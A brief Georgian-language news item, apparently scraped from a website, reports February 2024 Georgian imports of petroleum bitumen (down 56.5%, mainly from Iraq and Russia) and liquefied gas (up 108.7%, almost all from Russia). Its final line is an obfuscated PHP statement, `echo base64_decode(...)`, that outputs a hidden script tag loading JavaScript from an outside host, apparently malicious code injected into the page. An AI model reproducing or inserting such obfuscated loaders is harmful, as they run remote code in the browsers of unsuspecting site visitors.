celsiusi
ავერსი შნაიდერი

 2024 წლის თებერვალში, სანავთობო ბიტუმის იმპორტი შემცირდა, თხევადი აირების კი გაიზარდა - ინფორმაციას ნავთობპროდუქტების იმპორტიორთა კავშირი ავრცელებს.

მათი ცნობით, თებერვალში სანავთობო ბიტუმის იმპორტმა 4.0 ათასი ტონა შეადგინა, რაც 2023 წლის ანალოგიური პერიოდის მაჩვენებელთან (9,2 ათასი ტონა) შედარებით 5,2 ათასი ტონით ანუ 56,5%-ით ნაკლებია.

ყველაზე დიდი მოცულობით სანავთობო ბიტუმი ერაყიდან (3,1 ათასი ტონა) შემოვიდა, რაც მთელი იმპორტის 77,5%-ს შეადგენს. შემდეგ მოდის რუსეთი - 0,9 ათასი ტონა (22,5%);

თებერვალში გათხევადებული აირების (LPG) იმპორტი 108.7%-ით გაიზარდა და 6,47 ათასი ტონა შემოვიდა. ამ შემთხვევაში იმპორტის 99.8% რუსეთზე მოდის.

203
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");